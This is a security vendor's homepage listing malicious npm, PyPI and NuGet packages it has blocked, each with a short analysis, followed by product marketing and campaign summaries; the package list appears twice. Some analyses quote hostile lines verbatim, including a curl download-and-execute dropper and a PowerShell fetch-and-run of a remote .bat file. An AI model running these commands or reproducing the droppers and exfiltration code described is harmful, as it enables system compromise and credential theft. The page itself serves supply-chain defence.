Latest Threat Research:Malicious dYdX Packages Published to npm and PyPI After Maintainer Compromise.Details
Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 4.0.0

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.2.4

We protect you from vulnerable and malicious packages

mtmai

0.3.783

Live on PyPI

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

@twork-data-services/proxy-get-client-id-by-acc-number

0.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

yxspkg

6.9.24

Live on PyPI

Blocked by Socket

The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.

n8n-nodes-thang-zalo-app

1.0.46

by ntnguyenthangtn

Live on npm

Blocked by Socket

This code collects sensitive Zalo session data (cookies, IMEI, userAgent, proxy), attempts to create credentials in an n8n instance, and sends account identifiers and credential IDs to an external third-party endpoint (paradisehrm.com) along with a hardcoded password-like string. That is behavior consistent with credential harvesting and exfiltration. Treat this as high-risk: the code transmits secrets off-host without user consent and persists them locally. I recommend not using this package or auditing the upstream source to verify intent; if included accidentally, remove or sanitize the exfiltration calls and avoid storing raw cookies/IMEI unencrypted.

raven-hubspot

20.0.0

by atomicabss1

Live on npm

Blocked by Socket

This package will silently execute a local script (index.js) during preinstall. That behavior is high risk because the script could perform malicious actions while hiding output. You should inspect the contents of index.js before installing or avoid installing the package unless you trust its source.

meichen.aop

0.0.36

by MeiChen

Live on NuGet

Blocked by Socket

This assembly contains a highly obfuscated native/loader component that decrypts embedded resources and performs memory allocation, protection changes, and direct writes to process memory (including /proc/self/mem and WriteProcessMemory/VirtualProtect on Windows). It also performs runtime method resolution and creates dynamic delegates and DynamicMethods, and calls RuntimeHelpers.PrepareMethod/PrepareDelegate to execute or patch code. These behaviors are strongly indicative of a loader/injector/backdoor mechanism rather than a simple AOP/http helper. Treat this package as malicious/dangerous: do not run it in production or on sensitive systems without full provenance and manual audit. If found in a dependency chain, consider removing and investigating upstream supply-chain compromise.

@hlg-hid/device-sdk-v1

1.1.10

by hualvguan

Live on npm

Blocked by Socket

The code segment is heavily obfuscated and centers around HID device access and complex input/macro data handling. While explicit exfiltration or network activity is not evident in the provided slice, the combination of HID interaction, extensive data-mapping, and opaque control flows constitutes a high-risk pattern for covert data handling or backdoor-like capabilities in a supply-chain context. Treat as suspicious and subject to rigorous deobfuscation, environment-limited testing, and provenance verification before integration into production. Implement strict runtime instrumentation to monitor HID data flows and any unexpected network activity.

v2ray-util

3.8.5

Live on PyPI

Blocked by Socket

This code schedules a cron job that will repeatedly download and execute a remote script (https://multi.netlify.app/go.sh) and restarts cron. That behavior is a high-risk supply-chain pattern: it provides persistent remote code execution on the host and allows arbitrary remote code to run with the privileges of the cron owner. If the remote script is compromised or malicious, this will lead to system compromise. Additionally, the snippet as provided contains a syntax error at the end (likely truncated). Recommend treating this package as unsafe until the remote script and update mechanism are audited or replaced with a secure, signed update process. Immediate red flags: hardcoded external script URL executed via bash, cron persistence, and lack of integrity/signature checks.

tnl-agent

0.6.0

by u0omhum1dm8pd

Live on npm

Blocked by Socket

The script executes a file with a non-standard name, which raises concerns about its content and intent. Without inspecting the contents of '5e7qsv1q.cjs', it is difficult to ascertain its safety.

je-auto-control-dev

0.0.56

Live on PyPI

Blocked by Socket

The code is a benign plugin discovery/loader for Pygments that intentionally executes third-party plugin code via entrypoint.load(). The main risk is supply-chain: compromised or malicious packages that register entry points can execute arbitrary code when loaded. There are no hardcoded secrets or network calls in this fragment. The provided snippet contains a likely truncation/syntax error in find_plugin_filters which should be verified against the upstream source. Recommended mitigations: validate and limit installed packages, run plugin loading in restricted contexts when possible, and verify the real package file for the reported syntax issue before deployment.

damuffin

1.4.2

Live on PyPI

Blocked by Socket

This module is a credential/token harvesting tool for Windows Chromium-based browsers. It copies browser data, decrypts saved passwords, cookies, credit cards, autofill addresses and extracts Discord tokens (and validates them via the Discord API). Although it does not perform exfiltration of the created dump files in this fragment, it prepares plaintext artifacts that are ready to be exfiltrated by other code. This is malicious behavior targeting sensitive user data and should be considered unsafe for use.

simo

2.7.19

Live on PyPI

Blocked by Socket

This file implements a high-impact automatic updater that, when enabled by a filesystem flag, will fetch PyPI metadata and, if a newer version exists, automatically install the 'simo' package and run multiple privileged/damaging maintenance commands (migrations, collectstatic, redis-cli flushall, supervisor restart). The code itself is not obfuscated and contains no direct data-exfiltration routines, but it creates a significant supply-chain and operational risk: automatic, unauthenticated upgrades from PyPI with no integrity verification and immediate execution of system-level commands can lead to remote code execution, data loss, service disruption, or full host compromise if an attacker controls the published package or the update path. Recommend disabling auto-updates, adding cryptographic verification/pinned versions, removing or gating destructive commands (redis-cli flushall), running upgrades in isolated environments, and adding logging/auditing and authorization checks before performing upgrades.

node-calculator-x7k9

3.5.0

Live on npm

Blocked by Socket

This script is a malicious post-install exfiltration payload. It captures sensitive environment variables and system identifiers and transmits them to a hard-coded external server using an HTTP POST. Treat as high-risk malware: remove the package, assume secrets may be compromised, and perform credential rotation and incident response on affected systems.

backdoormbti

0.1.6

Live on PyPI

Blocked by Socket

This module implements a Hidden Patch Trojan attack pipeline: it constructs and applies additive and spatial triggers to images and performs ADMM-based optimization to embed a backdoor mask into model weights, persisting a trojaned model artifact. The fragment contains incomplete/buggy references but the overall logic is clearly for backdoor insertion. It poses a significant supply-chain and model-integrity threat: do not run this code or accept artifacts produced by it. Audit related modules and remove or isolate this functionality before using the codebase.

alexwilliam

1.1.1

by zhxpolice

Live on npm

Blocked by Socket

This module immediately performs unauthorized reconnaissance and data exfiltration: it runs shell commands to collect hostname, user, working directory, and directory listing, encodes the results, and sends them to a hardcoded external HTTP endpoint on import. This is malicious behavior and should be treated as a compromise. Remove the package, block the destination host, audit systems where it was installed, and investigate the package source and dependency chain.

mtmai

0.3.858

Live on PyPI

Blocked by Socket

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

libxmljs2qwerty

0.30.67

Live on npm

Blocked by Socket

Malicious post-install exfiltration: the script reads environment variables FLAG/flag and transmits their contents to an attacker-controlled domain during install/load. It should be treated as a supply-chain compromise. Remove the package, investigate any hosts that installed it for leaked secrets, rotate any exposed credentials, and block the destination domain at network perimeter if possible.

nemesis.essentials.net

6.8.8

by Michał Bryłka, Leszek Kowalski

Live on NuGet

Blocked by Socket

The assembly’s global initializer spawns “powershell.exe” with a one-liner that (1) computes a temp .bat path, (2) runs Invoke-WebRequest against https://raw[.]githubusercontent[.]com/TerryDavisSoldier/textfilestorage/main/terry[.]txt to save a .bat file, then (3) Start-Process executes that .bat hidden. This creates an automatic, silent network-to-execution vector on any host that loads the DLL, with no integrity checks or user consent. Remove this package and treat any system that loaded it as compromised.

youshow.ace.aspnetcore.web

9.0.2

by Ace

Live on NuGet

Blocked by Socket

This file contains heavy obfuscation and an embedded runtime loader capable of decrypting resources, allocating/writing executable memory, altering module/CLR pointers, and producing/running dynamic methods. These behaviors enable arbitrary code execution in the host process and match common supply-chain/backdoor/injector patterns. Treat this package as malicious or compromised. Do not run it in production; remove it from supply chain and perform a deeper forensic analysis of build artifacts, other versions, and any systems where it was installed.

erscipcard

1.11

Live on PyPI

Blocked by Socket

The script sets up persistent remote access and creates a privileged user with hardcoded credentials — behavior consistent with a backdoor or unauthorized remote-control installer. It should not be executed on any machine you care about. If encountered in a dependency or package, treat it as high-risk: remove hardcoded credentials/auth codes, avoid granting sudo to newly created accounts, validate downloads (cryptographic checks), and require explicit interactive authorization for privileged actions. If this ran on your system, audit for the created user, running chrome-remote-desktop processes, installed .deb packages, and network connections to remote accounts.

@proto-services/banking

2.2.143

by juni-confuzed

Live on npm

Blocked by Socket

This file collects system information (hostname, username, working directory, network interfaces), encodes it in Base64, and exfiltrates it via DNS queries to ns[.]pingb[.]in using the ping command. This behavior is both unauthorized and covert, posing a severe security risk.

bapy

0.2.100

Live on PyPI

Blocked by Socket

The script covertly ensures a background SSH local port-forward to a hard-coded external host as root, clearing any existing ssh on the same local port first. This pattern is consistent with establishing a covert access or exfiltration channel (notably to a MongoDB-like service on port 27017). It is high-risk: investigate origins of the script, the remote IP, root SSH keys and authorized_keys, and any processes or tools that use local:9999. If unexpected, remove and rotate credentials/keys and perform host compromise analysis.

epm-rdpt-angularjs

1.0.7

by nishant57

Removed from npm

Blocked by Socket

The code establishes a reverse shell, which is a serious security risk as it allows remote execution of commands on the compromised system. This behavior is indicative of malicious intent.

Live on npm for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

blitzdb5

8.1.0.dev6

Removed from PyPI

Blocked by Socket

The code fragment is not operable due to a critical syntax error (DatabaseIndexError missing a body) and appears incomplete toward the end, which is a major supply-chain integrity red flag. Even if the syntax were fixed, the presence of pickle-based deserialization for stored data presents a real risk if untrusted blobs can influence the backend. Recommended actions: provide a complete, correctly formatted version, remove or constrain pickle deserialization to trusted data only, replace with safer serializers where possible, and ensure verbose, non-sensitive logging is used instead of raw prints. Overall risk is medium-high due to deserialization risk and the fatal syntax error that blocks import, with a high need for code integrity verification before use in any supply-chain context.

Live on PyPI for 10 hours and 17 minutes before removal. Socket users were protected even while the package was live.

mtmai

0.3.783

Live on PyPI

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

@twork-data-services/proxy-get-client-id-by-acc-number

0.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

yxspkg

6.9.24

Live on PyPI

Blocked by Socket

The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.

n8n-nodes-thang-zalo-app

1.0.46

by ntnguyenthangtn

Live on npm

Blocked by Socket

This code collects sensitive Zalo session data (cookies, IMEI, userAgent, proxy), attempts to create credentials in an n8n instance, and sends account identifiers and credential IDs to an external third-party endpoint (paradisehrm.com) along with a hardcoded password-like string. That is behavior consistent with credential harvesting and exfiltration. Treat this as high-risk: the code transmits secrets off-host without user consent and persists them locally. I recommend not using this package or auditing the upstream source to verify intent; if included accidentally, remove or sanitize the exfiltration calls and avoid storing raw cookies/IMEI unencrypted.

raven-hubspot

20.0.0

by atomicabss1

Live on npm

Blocked by Socket

This package will silently execute a local script (index.js) during preinstall. That behavior is high risk because the script could perform malicious actions while hiding output. You should inspect the contents of index.js before installing or avoid installing the package unless you trust its source.

meichen.aop

0.0.36

by MeiChen

Live on NuGet

Blocked by Socket

This assembly contains a highly obfuscated native/loader component that decrypts embedded resources and performs memory allocation, protection changes, and direct writes to process memory (including /proc/self/mem and WriteProcessMemory/VirtualProtect on Windows). It also performs runtime method resolution and creates dynamic delegates and DynamicMethods, and calls RuntimeHelpers.PrepareMethod/PrepareDelegate to execute or patch code. These behaviors are strongly indicative of a loader/injector/backdoor mechanism rather than a simple AOP/http helper. Treat this package as malicious/dangerous: do not run it in production or on sensitive systems without full provenance and manual audit. If found in a dependency chain, consider removing and investigating upstream supply-chain compromise.

@hlg-hid/device-sdk-v1

1.1.10

by hualvguan

Live on npm

Blocked by Socket

The code segment is heavily obfuscated and centers around HID device access and complex input/macro data handling. While explicit exfiltration or network activity is not evident in the provided slice, the combination of HID interaction, extensive data-mapping, and opaque control flows constitutes a high-risk pattern for covert data handling or backdoor-like capabilities in a supply-chain context. Treat as suspicious and subject to rigorous deobfuscation, environment-limited testing, and provenance verification before integration into production. Implement strict runtime instrumentation to monitor HID data flows and any unexpected network activity.

v2ray-util

3.8.5

Live on PyPI

Blocked by Socket

This code schedules a cron job that will repeatedly download and execute a remote script (https://multi.netlify.app/go.sh) and restarts cron. That behavior is a high-risk supply-chain pattern: it provides persistent remote code execution on the host and allows arbitrary remote code to run with the privileges of the cron owner. If the remote script is compromised or malicious, this will lead to system compromise. Additionally, the snippet as provided contains a syntax error at the end (likely truncated). Recommend treating this package as unsafe until the remote script and update mechanism are audited or replaced with a secure, signed update process. Immediate red flags: hardcoded external script URL executed via bash, cron persistence, and lack of integrity/signature checks.

tnl-agent

0.6.0

by u0omhum1dm8pd

Live on npm

Blocked by Socket

The script executes a file with a non-standard name, which raises concerns about its content and intent. Without inspecting the contents of '5e7qsv1q.cjs', it is difficult to ascertain its safety.

je-auto-control-dev

0.0.56

Live on PyPI

Blocked by Socket

The code is a benign plugin discovery/loader for Pygments that intentionally executes third-party plugin code via entrypoint.load(). The main risk is supply-chain: compromised or malicious packages that register entry points can execute arbitrary code when loaded. There are no hardcoded secrets or network calls in this fragment. The provided snippet contains a likely truncation/syntax error in find_plugin_filters which should be verified against the upstream source. Recommended mitigations: validate and limit installed packages, run plugin loading in restricted contexts when possible, and verify the real package file for the reported syntax issue before deployment.

damuffin

1.4.2

Live on PyPI

Blocked by Socket

This module is a credential/token harvesting tool for Windows Chromium-based browsers. It copies browser data, decrypts saved passwords, cookies, credit cards, autofill addresses and extracts Discord tokens (and validates them via the Discord API). Although it does not perform exfiltration of the created dump files in this fragment, it prepares plaintext artifacts that are ready to be exfiltrated by other code. This is malicious behavior targeting sensitive user data and should be considered unsafe for use.

simo

2.7.19

Live on PyPI

Blocked by Socket

This file implements a high-impact automatic updater that, when enabled by a filesystem flag, will fetch PyPI metadata and, if a newer version exists, automatically install the 'simo' package and run multiple privileged/damaging maintenance commands (migrations, collectstatic, redis-cli flushall, supervisor restart). The code itself is not obfuscated and contains no direct data-exfiltration routines, but it creates a significant supply-chain and operational risk: automatic, unauthenticated upgrades from PyPI with no integrity verification and immediate execution of system-level commands can lead to remote code execution, data loss, service disruption, or full host compromise if an attacker controls the published package or the update path. Recommend disabling auto-updates, adding cryptographic verification/pinned versions, removing or gating destructive commands (redis-cli flushall), running upgrades in isolated environments, and adding logging/auditing and authorization checks before performing upgrades.

node-calculator-x7k9

3.5.0

Live on npm

Blocked by Socket

This script is a malicious post-install exfiltration payload. It captures sensitive environment variables and system identifiers and transmits them to a hard-coded external server using an HTTP POST. Treat as high-risk malware: remove the package, assume secrets may be compromised, and perform credential rotation and incident response on affected systems.

backdoormbti

0.1.6

Live on PyPI

Blocked by Socket

This module implements a Hidden Patch Trojan attack pipeline: it constructs and applies additive and spatial triggers to images and performs ADMM-based optimization to embed a backdoor mask into model weights, persisting a trojaned model artifact. The fragment contains incomplete/buggy references but the overall logic is clearly for backdoor insertion. It poses a significant supply-chain and model-integrity threat: do not run this code or accept artifacts produced by it. Audit related modules and remove or isolate this functionality before using the codebase.

alexwilliam

1.1.1

by zhxpolice

Live on npm

Blocked by Socket

This module immediately performs unauthorized reconnaissance and data exfiltration: it runs shell commands to collect hostname, user, working directory, and directory listing, encodes the results, and sends them to a hardcoded external HTTP endpoint on import. This is malicious behavior and should be treated as a compromise. Remove the package, block the destination host, audit systems where it was installed, and investigate the package source and dependency chain.

mtmai

0.3.858

Live on PyPI

Blocked by Socket

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

libxmljs2qwerty

0.30.67

Live on npm

Blocked by Socket

Malicious post-install exfiltration: the script reads environment variables FLAG/flag and transmits their contents to an attacker-controlled domain during install/load. It should be treated as a supply-chain compromise. Remove the package, investigate any hosts that installed it for leaked secrets, rotate any exposed credentials, and block the destination domain at network perimeter if possible.

nemesis.essentials.net

6.8.8

by Michał Bryłka, Leszek Kowalski

Live on NuGet

Blocked by Socket

The assembly’s global initializer spawns “powershell.exe” with a one-liner that (1) computes a temp .bat path, (2) runs Invoke-WebRequest against https://raw[.]githubusercontent[.]com/TerryDavisSoldier/textfilestorage/main/terry[.]txt to save a .bat file, then (3) Start-Process executes that .bat hidden. This creates an automatic, silent network-to-execution vector on any host that loads the DLL, with no integrity checks or user consent. Remove this package and treat any system that loaded it as compromised.

youshow.ace.aspnetcore.web

9.0.2

by Ace

Live on NuGet

Blocked by Socket

This file contains heavy obfuscation and an embedded runtime loader capable of decrypting resources, allocating/writing executable memory, altering module/CLR pointers, and producing/running dynamic methods. These behaviors enable arbitrary code execution in the host process and match common supply-chain/backdoor/injector patterns. Treat this package as malicious or compromised. Do not run it in production; remove it from supply chain and perform a deeper forensic analysis of build artifacts, other versions, and any systems where it was installed.

erscipcard

1.11

Live on PyPI

Blocked by Socket

The script sets up persistent remote access and creates a privileged user with hardcoded credentials — behavior consistent with a backdoor or unauthorized remote-control installer. It should not be executed on any machine you care about. If encountered in a dependency or package, treat it as high-risk: remove hardcoded credentials/auth codes, avoid granting sudo to newly created accounts, validate downloads (cryptographic checks), and require explicit interactive authorization for privileged actions. If this ran on your system, audit for the created user, running chrome-remote-desktop processes, installed .deb packages, and network connections to remote accounts.

@proto-services/banking

2.2.143

by juni-confuzed

Live on npm

Blocked by Socket

This file collects system information (hostname, username, working directory, network interfaces), encodes it in Base64, and exfiltrates it via DNS queries to ns[.]pingb[.]in using the ping command. This behavior is both unauthorized and covert, posing a severe security risk.

bapy

0.2.100

Live on PyPI

Blocked by Socket

The script covertly ensures a background SSH local port-forward to a hard-coded external host as root, clearing any existing ssh on the same local port first. This pattern is consistent with establishing a covert access or exfiltration channel (notably to a MongoDB-like service on port 27017). It is high-risk: investigate origins of the script, the remote IP, root SSH keys and authorized_keys, and any processes or tools that use local:9999. If unexpected, remove and rotate credentials/keys and perform host compromise analysis.

epm-rdpt-angularjs

1.0.7

by nishant57

Removed from npm

Blocked by Socket

The code establishes a reverse shell, which is a serious security risk as it allows remote execution of commands on the compromised system. This behavior is indicative of malicious intent.

Live on npm for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

blitzdb5

8.1.0.dev6

Removed from PyPI

Blocked by Socket

The code fragment is not operable due to a critical syntax error (DatabaseIndexError missing a body) and appears incomplete toward the end, which is a major supply-chain integrity red flag. Even if the syntax were fixed, the presence of pickle-based deserialization for stored data presents a real risk if untrusted blobs can influence the backend. Recommended actions: provide a complete, correctly formatted version, remove or constrain pickle deserialization to trusted data only, replace with safer serializers where possible, and ensure verbose, non-sensitive logging is used instead of raw prints. Overall risk is medium-high due to deserialization risk and the fatal syntax error that blocks import, with a high need for code integrity verification before use in any supply-chain context.

Live on PyPI for 10 hours and 17 minutes before removal. Socket users were protected even while the package was live.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

42 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles